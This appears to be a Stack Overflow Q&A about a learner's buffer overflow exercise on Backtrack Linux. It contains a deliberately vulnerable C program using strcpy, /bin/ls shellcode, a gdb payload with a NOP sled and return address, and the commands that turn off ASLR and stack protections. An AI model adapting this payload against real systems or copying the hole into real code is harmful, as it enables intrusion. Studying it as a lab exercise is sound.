5

I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.

Here is my C program

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if(argc==2)
    {

    strcpy(buffer, argv[1]);  //vulnerable function

    }

    return 0;
}

This is the shellcode I am using, which corresponds to simple /bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

I inject this shellcode in gdb using following command

run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')

As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.

I have disabled the ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space

and also compiled my binary using fno-stack-protector option.

Any idea what's the cause of SIGSEGV ?

Ethan Heilman
  • 16,347
  • 11
  • 61
  • 88
Madhur Ahuja
  • 22,211
  • 14
  • 71
  • 124

2 Answers2

7

I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows

gcc -z execstack

Madhur Ahuja
  • 22,211
  • 14
  • 71
  • 124
0

Have you disabled stack smashing protection in GCC (-fno-stack-protector)?

How to turn off gcc compiler optimization to enable buffer overflow

Community
  • 1
  • 1
pepsi
  • 6,785
  • 6
  • 42
  • 74